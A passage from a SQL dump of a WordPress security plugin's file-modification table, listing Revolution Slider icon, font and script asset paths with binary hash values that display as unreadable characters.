MBD\r','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_more_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_more_24px.svg',0,'a%-~uh','a%-~uh','qBW==GL],c+t*W','',0,'?'),('%B:e}&','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_more_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_more_36px.svg',0,'1s4UW` jF','1s4UW` jF','6p:ȋN$Y\"2kgMc! (','',0,'?'),('gS~6>ɺ[Z','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_adb_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_adb_24px.svg',0,'#jVILts@','#jVILts@','ߑ5Pǔg1YGq*}\r\nr%L','',0,'?'),('O 9\nqcx5','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_flat_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_flat_24px.svg',0,'Y\r~Px','Y\r~Px','ѳ^մbpFNQؚ_f39Jt','',0,'?'),('GoUjm ZG qo','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_flat_angled_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_flat_angled_24px.svg',0,'|l]ɹdf','|l]ɹdf','}Ϟ.ܗk,/y-Qj7W3','',0,'?'),('QPUv;Z3','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_individual_suite_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_individual_suite_24px.svg',0,'{,q<+\'','{,q<+\'','MMU4@VxG 0V\rp&/N}','',0,'?'),('J:xUjZi\'՘@','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_extra_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_extra_24px.svg',0,'#JY*\"V','#JY*\"V','laqNNN،\Z=کl','',0,'?'),('\\F\\E94W+','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_normal_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_normal_24px.svg',0,'&FqiiЃu8','&FqiiЃu8','` \nsF:1cq*s\0u','',0,'?'),('$>#9l','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_reduced_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_reduced_24px.svg',0,'R<hd','R<hd',':KgU\r{An1ٻjO,','',0,'?'),('}b~','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_recline_extra_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_recline_extra_24px.svg',0,'3XѶG \ZQ','3XѶG \ZQ','%Ax%8_MS/)LfkJh`F','',0,'?'),('KQԉ+]d','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_recline_normal_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_recline_normal_24px.svg',0,'*I\"I[','*I\"I[','ͦʼn!Uw]sVHI~%/','',0,'?'),('o~5ץ\\Ծ','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_bluetooth_audio_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_bluetooth_audio_24px.svg',0,'c\r;Ǐ_','c\r;Ǐ_','>TV\nC~8LOɁYvK˶De\'%','',0,'?'),('n\01 \n@','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_confirmation_number_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_confirmation_number_24px.svg',0,'܄4\\t_','܄4\\t_','*),$ O*>p07g\'Q6\0Z','',0,'?'),(' $:}j ','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_disc_full_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_disc_full_24px.svg',0,'+Փv2','+Փv2','xڮg7,.o<5Pf4]rK','',0,'?'),('m8Iyc','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_do_not_disturb_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_do_not_disturb_24px.svg',0,'0}} w','0}} w','幑姥6wXK]I;x4','',0,'?'),('q|! \\RxO','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_do_not_disturb_alt_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_do_not_disturb_alt_24px.svg',0,'0)u)m','0)u)m','hz?딡s;1Wk \"D͟','',0,'?'),('h+DAN','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_drive_eta_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_drive_eta_24px.svg',0,']g>p~ܼv',']g>p~ܼv','P,tZ %WDxW@Ow`Z,/','',0,'?'),('),l]j;ZU','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_enhanced_encryption_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_enhanced_encryption_24px.svg',0,'VZSF[/n','VZSF[/n','!#','z7sU]>#','ەՎposf\Zw\0$sPmEԛ&','',0,'?'),('rnA:5c=3','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_live_tv_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_live_tv_24px.svg',0,'LŻeư','LŻeư','hfЉ\ZYc+Cϡ &֦','',0,'?'),('\Z!wr^ÅW','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_mms_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_mms_24px.svg',0,'~&Qăpt8Zo','~&Qăpt8Zo','`8q4?sBzK97N1^;X','',0,'?'),('& Aǝi U','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_more_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_more_24px.svg',0,'G%Y av\"B','G%Y av\"B',';NhG<\\u#P2t@r(h]EN\0','',0,'?'),('/ !\ZdsJ','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_network_check_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_network_check_24px.svg',0,'wu) H','wu) H','O]*1Ck\0&g5םt','',0,'?'),('_&O >TF2F>','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_network_locked_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_network_locked_24px.svg',0,'V|S LOƝre','V|S LOƝre','-aK /hJ\0Xr7pZ΃z# ','',0,'?'),('-]0F$','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_no_encryption_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_no_encryption_24px.svg',0,'|)djO~l Z','|)djO~l Z','\"ŀIq6yeS[z<\0V3·Yn ~B@','',0,'?'),('2\\\\(#','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_ondemand_video_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_ondemand_video_24px.svg',0,';̄r9n',';̄r9n','Hr+0Ow#bCD=mkҍ\'|','',0,'?'),('Z#o9_','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_personal_video_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_personal_video_24px.svg',0,'Kh}e;gIJwU','Kh}e;gIJwU','?dz2`~v\ZQ1خ*Ҕqd','',0,'?'),('kiu̥,heG2','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_bluetooth_speaker_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_bluetooth_speaker_24px.svg',0,'ҞlGnNv(/','ҞlGnNv(/','ST;`L;$uPd:\Zgf\r','',0,'?'),('$$oQqmvyH%','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_forwarded_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_forwarded_24px.svg',0,'(Kmx};`y|J','(Kmx};`y|J','=Y8n-[\r%N%|DDmZ K{','',0,'?'),('@A/Ń h','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_in_talk_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_in_talk_24px.svg',0,'fbǤ(Mus','fbǤ(Mus','lͤzxӞd_[%g1eKHrJD4','',0,'?'),('O\rK7','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_locked_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_locked_24px.svg',0,'s\r) ߄_','s\r) ߄_','$h\0zHH C5& cy6','',0,'?'),('#?\'Y}6k!U','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_missed_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_missed_24px.svg',0,'pCTul','pCTul','r Ըm%\nDp ?\n3 ','',0,'?'),('\'F=(bJ\'$0','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_paused_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_paused_24px.svg',0,'\r\"2=3v$','\r\"2=3v$','|\03k9RIJ]g!Pkn','',0,'?'),('> 0\rP','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_power_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_power_24px.svg',0,'`p.* ','`p.* ','\ZO&h4nܲQ ','',0,'?'),('P$ k[\r[','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_rv_hookup_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_rv_hookup_24px.svg',0,'U9rm7D\"C','U9rm7D\"C','$0M[\'+`Bŗu6[RY','',0,'?'),('BFa^A\"','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sd_card_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sd_card_24px.svg',0,'$NoIgB','$NoIgB','gl 7IՁA=','',0,'?'),('M# -߿&Y}','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sim_card_alert_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sim_card_alert_24px.svg',0,'0N\r\'0M8~W','0N\r\'0M8~W','\n1k %fE%P gzxڹ','',0,'?'),('E%j6dI@B','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sms_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sms_24px.svg',0,'R5!6/!+','R5!6/!+','\\s\nm;{s(\nC(E8\'+\n','',0,'?'),('=Y0K?','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sms_failed_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sms_failed_24px.svg',0,'?ә`EC -,p','?ә`EC -,p','c3\rmpi 2S8;h mz','',0,'?'),('(M#$=~Հ}','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_24px.svg',0,'r/2%&.V','r/2%&.V','h)u⬉!{G\0\0\0xY#iDV','',0,'?'),('v;Ryc>)\ZY','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_disabled_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_disabled_24px.svg',0,'wɺOn','wɺOn','6V0V \"\'?7X6','',0,'?'),('(զ̂W꧷','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_problem_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_problem_24px.svg',0,'\n¶wd߻My','\n¶wd߻My','=dR]=<ɃwưYVfZ\Z?','',0,'?'),('JͶ[2۰0','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_system_update_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_system_update_24px.svg',0,'C.BjmiǷ','C.BjmiǷ','ttNGytJ5o X','',0,'?'),('48+C%(Vc','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_tap_and_play_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_tap_and_play_24px.svg',0,'hj_ΎٿEA','hj_ΎٿEA','I|І$Ƨ~ax]m76 $k','',0,'?'),('Yq_[ @','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_time_to_leave_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_time_to_leave_24px.svg',0,']g>p~ܼv',']g>p~ܼv','P,tZ %WDxW@Ow`Z,/','',0,'?'),('!\n-L+','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_vibration_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_vibration_24px.svg',0,'j%+qX9CV','j%+qX9CV','\"g\Z2.Io','wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_wifi_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_wifi_24px.svg',0,'V=Bj2gUA','V=Bj2gUA','!7v4V>A[dT36|\r\0','',0,'?'),('hp?](VÞtK','wp-content/plugins/revslider/public/assets/assets/svg/places/ic_ac_unit_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/places/ic_ac_unit_24px.svg',0,'?`v zs>>','?`v zs>>','@~ę:vYO{y3,@t','',0,'?'),('n^|+a-\\U.s2˭','',0,'?'),('s\"_W','wp-content/plugins/revslider/public/assets/assets/svg/places/ic_child_care_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/places/ic_child_care_24px.svg',0,'d>+`','d>+`','NIZtmlIPjG^$Ax','',0,'?'),('ꐹ.\r1\n','wp-content/plugins/revslider/public/assets/assets/svg/places/ic_child_friendly_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/places/ic_child_friendly_24px.svg',0,'\":X?&\\c','\":X?&\\c','Iw.djH:q]9-Y&M\'q','',0,'?'),('gViC,Q','wp-content/plugins/revslider/public/assets/assets/svg/places/ic_fitness_center_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/places/ic_fitness_center_24px.svg',0,'2@[e#WO','2@[e#WO','~:N\\\0rtc2p hF%Q7-','',0,'?'),('p͔A+','wp-content/plugins/revslider/public/assets/assets/svg/places/ic_free_breakfast_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/places/ic_free_breakfast_24px.svg',0,'Cc\ndb,_֨','Cc\ndb,_֨','H9仹nCobo/hl','',0,'?'),('i3,wRuة','wp-content/plugins/revslider/public/assets/assets/svg/places/ic_golf_course_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/places/ic_golf_course_24px.svg',0,'91Fkm[҅U','91Fkm[҅U','lĠ6;\rlט/\Z_^&v]\\7yG','',0,'?'),('n\\~0ظL-','wp-content/plugins/revslider/public/assets/assets/svg/places/ic_hot_tub_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/places/ic_hot_tub_24px.svg',0,'Pƭ_bNUc]z','Pƭ_bNUc]z','.pA+Qvge] \'V\"{} ','',0,'?'),('|_]23<><','wp-content/plugins/revslider/public/assets/assets/svg/places/ic_kitchen_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/places/ic_kitchen_24px.svg',0,'nI\\FB &hF','nI\\FB &hF','\" W=y$4wM@T>','',0,'?'),(')(\0C),LG','wp-content/plugins/revslider/public/assets/assets/svg/places/ic_pool_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/places/ic_pool_24px.svg',0,'$3N|jY','$3N|jY','ra`Uc:Yoj\Z\\&.[','',0,'?'),('\0ή;d2O`\\','&m\ZF:>2O`\\','a3kWSAM\\3 ^ƹH','',0,'?'),('9ÒfxO@x','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_domain_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_domain_24px.svg',0,'!lIWHP@~\'!DKSRƇ','',0,'?'),('SV˯Pv ','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_location_city_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_location_city_24px.svg',0,'` BGNYh:O','` BGNYh:O',' ß>6 K\\ֲ~H˿Xgf','',0,'?'),('6m\\*ݦ','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_mood_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_mood_24px.svg',0,'l!qM+x k-','l!qM+x k-','\0ꧤ^vޕO͍rr0#t','',0,'?'),('!yW>:\0?zX6a_','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_mood_bad_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_mood_bad_24px.svg',0,'ƫPff\'','ƫPff\'','%Z06HJr#ͩ\\jOUíw','',0,'?'),('C?\Zw=̗ O/g7','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_24px.svg',0,'R](w٧n','R](w٧n','e o>yg\\PK34+we\0','',0,'?'),(':k1I','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_active_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_active_24px.svg',0,' *g)d',' *g)d',']p46,.VM~=n-\'','',0,'?'),('S?|ѿ','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_none_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_none_24px.svg',0,'\\=.>VB|\Z','\\=.>VB|\Z','\\\\3N1Ka,+?Wʋ\0','',0,'?'),(';7C+߱','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_off_24px.svg',0,'yOi.u.>','yOi.u.>','$Z pyfNOGN@c','',0,'?'); INSERT INTO `wpvt_wffilemods` (`filenameMD5`, `filename`, `real_path`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES ('w:Z&?\Z6v','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_paused_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_paused_24px.svg',0,'k]gGHv+','k]gGHv+','5TLykzLc6 !Nެ\",Ӹ','',0,'?'),('\ZzX8NDi','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_pages_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_pages_24px.svg',0,'H֑\"Xo3S ','H֑\"Xo3S ','uY*DS6/#\r{gDm d\0','',0,'?'),('U(νT扰qc','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_party_mode_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_party_mode_24px.svg',0,'0 ^0','0 ^0','VV%oHKմYL','',0,'?'),('>;ph.t$\r','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_people_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_people_24px.svg',0,'LbshGn ','LbshGn ','Pe[ FyƟ6V QwW^','',0,'?'),('S\na%&DΉ$','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_people_outline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_people_outline_24px.svg',0,',:,^BVm',',:,^BVm','Uԋhy0F9zUp| ij\0','',0,'?'),('LS\r\n$','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_24px.svg',0,'mxn]}0mW','mxn]}0mW','G#nk\'RMm+\0 2,','',0,'?'),('%hZ','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_add_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_add_24px.svg',0,'\\*s2*I','\\*s2*I','ڵ8-J aˑ}%Qk','',0,'?'),('C2EWZJZ','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_outline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_outline_24px.svg',0,'@Ĥu@u\\','@Ĥu@u\\','uك#spO_=NAbmt6','',0,'?'),('iQ','D} #;>iQ','IMݻtOϓzOeO\ZzIP ','',0,'?'),('hy2Fĉoz`8E','wp-content/plugins/revslider/public/assets/assets/svg/social/ic_whatshot_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/social/ic_whatshot_24px.svg',0,'4,8cc+J','4,8cc+J','2_Moe,83Nv3H !','',0,'?'),(']A?< ','wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_check_box_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_check_box_24px.svg',0,'R89\0v','R89\0v','n߈TcQF/YOΙGđ','',0,'?'),('6\0?j?o/m','wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_check_box_outline_blank_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_check_box_outline_blank_24px.svg',0,'b!\nd\ZH@','b!\nd\ZH@','f 9`c-xd+.v{\'','',0,'?'),(';bja|@M (`','wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_indeterminate_check_box_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_indeterminate_check_box_24px.svg',0,'Oq%yEIfc','Oq%yEIfc','/mήpU&ֺ~qqW','',0,'?'),('pfȃ~Jk߽|','wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_radio_button_checked_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_radio_button_checked_24px.svg',0,'/$O\\FДcRGk','/$O\\FДcRGk','$lP6֗\"sxN1EX6 0 ','',0,'?'),(' 0KM}z','wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_radio_button_unchecked_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_radio_button_unchecked_24px.svg',0,'BWVYC>\n\"U','BWVYC>\n\"U','c&xO|ޛcaibg=w|5','',0,'?'),('w*Ÿj%(','wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_star_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_star_24px.svg',0,'MHJHh|Fj','',0,'?'),('~#W\Z\0','wp-content/plugins/revslider/public/assets/fonts/font-awesome/css/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/font-awesome/css/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('G>DsȤ\0','wp-content/plugins/revslider/public/assets/fonts/font-awesome/fonts/fontawesome-webfont.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/font-awesome/fonts/fontawesome-webfont.svg',0,'.murI1G ','.murI1G ','Lr7D@yɂ]NK(tiG9Tm=','',0,'?'),('0F#@1','wp-content/plugins/revslider/public/assets/fonts/font-awesome/fonts/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/font-awesome/fonts/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('0\'` c2_','wp-content/plugins/revslider/public/assets/fonts/font-awesome/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/font-awesome/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('ֵȫX7qc\Z>','wp-content/plugins/revslider/public/assets/fonts/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('x\nPL50]*','wp-content/plugins/revslider/public/assets/fonts/material/MaterialIcons-Regular.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/material/MaterialIcons-Regular.svg',0,'eYLP/(:','eYLP/(:','坴YCN:Q9kdZkxO','',0,'?'),('\"MOi\0 ۝BM','wp-content/plugins/revslider/public/assets/fonts/material/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/material/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('0q@G6k','wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/css/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/css/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('14Jd','wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/fonts/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/fonts/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('U\ZDȫ΃<[','wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('Ó]ɚdQv','wp-content/plugins/revslider/public/assets/fonts/revicons/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/revicons/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('`<6V޾ 9{','wp-content/plugins/revslider/public/assets/fonts/revicons/revicons.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/fonts/revicons/revicons.svg',0,'BT }9O','BT }9O',',:4^a{rrC\":9\"n*','',0,'?'),('<*1%GɫV9)','wp-content/plugins/revslider/public/assets/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('\nhjfm8:c','wp-content/plugins/revslider/public/assets/js/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/js/index.php',0,'9vK2p,Yw','9vK2p,Yw','Aũ`97}b>MHJHh|Fj','',0,'?'),('M;38;\'/ǯ','wp-content/plugins/revslider/public/assets/js/libs/noise.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/js/libs/noise.js',0,'#;Wi\"tQk1f','#;Wi\"tQk1f','{ʶ<Pu,B*TJsm?<\0','',0,'?'),('ހydtM\\a','wp-content/plugins/revslider/public/assets/js/libs/three.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/js/libs/three.min.js',0,'\n3c=@ȉo','\n3c=@ȉo','qV\0?͠s;qGΗDž|(\'kSuȂ','',0,'?'),('*|Cݩ 9N\0Q~','wp-content/plugins/revslider/public/assets/js/rbtools.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js',0,'\nqv`0?UyP_','\nqv`0?UyP_',')-PU2tyA䆈}','',0,'?'),('9َ3 